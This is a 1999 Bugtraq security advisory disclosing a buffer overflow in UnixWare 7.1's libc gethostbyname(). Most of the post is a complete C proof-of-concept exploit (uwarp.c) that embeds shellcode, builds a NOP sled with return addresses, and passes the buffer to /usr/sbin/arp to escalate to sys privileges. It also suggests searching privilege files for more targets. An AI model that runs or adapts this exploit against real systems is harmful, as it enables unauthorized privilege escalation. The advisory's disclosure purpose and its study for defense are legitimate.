=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Чт, 02 дек 1999  12:22:57

   От: Brock Tellier <btellier@USA.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: UnixWare 7 gethostbyname() overflow

--------------------------------------------------------------------------------




Greetings,



OVERVIEW

A serious bug exists in UnixWare 7.1's libc.  A buffer overflow in

gethostbyname() will allow any user to obtain elevated privileges.



BACKGROUND

Is this the same gethostbyname() overflow which was present in ancient 

versions of non-unixware libc's way back when?  I can't say for sure, but

given SCO's record of fixing known holes (remember the OpenServer 5

Xtlib overflows, still present four years after they were known?), I 

wouldn't doubt it.



DETAILS

Any program which uses gethostbyname() with user-defined input is

vulnerable to a buffer overflow attack.  These overflows come with

various eases of exploitability.  My demonstration program happened to

be "arp", but any program calling this function will do.  When exploiting

the dozens of programs vulnerable to this hole, don't forget to check

your /etc/security/tcb/privs file for other non-suid programs which may

allow you to elevate your privileges as well. See my uidadmin advisory

for more info on UW7's privilege system.



EXPLOIT

--- uwarp.c ---

/**

 ** UnixWare 7.1 arp exploit yields gid of sys 

 ** Demonstrates overflow in uw71's gethostbyname()

 ** use offsets of +-100

 ** Brock Tellier btellier@usa.net

 **       

 **/ 





#include <stdlib.h>

#include <stdio.h>



char scoshell[]= 

"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"

"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"

"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";



                       

#define LEN 3500

#define NOP 0x90



/* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx

unsigned long get_sp(void) {



__asm__("movl %esp, %eax");



}

*/



int main(int argc, char *argv[]) {



long int offset=0;



int i;

int buflen = LEN;

long int addr;

char buf[LEN];

 

 if(argc > 3) {

  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);

        exit(0); 

 }

 else if (argc == 2){

   offset=atoi(argv[1]);

   

 }

 else if (argc == 3) {

  offset=atoi(argv[1]);

  buflen=atoi(argv[2]); 

   

 }

 else {

   offset=100;

   buflen=3000;



 }

 



addr=0x8046b75 + offset;



fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");

fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");

fprintf(stderr, "Using addr: 0x%x\n", addr+offset);



memset(buf,NOP,buflen);

memcpy(buf+(buflen/2),scoshell,strlen(scoshell));

for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)

        *(int *)&buf[i]=addr;



execl("/usr/sbin/arp", "arp", buf,

NULL);



exit(0);

}



------

Brock Tellier

UNIX Systems Administrator

Chicago, IL, USA

btellier@usa.net



____________________________________________________________________

Get free email and a permanent address at http://www.netaddress.com/?N=1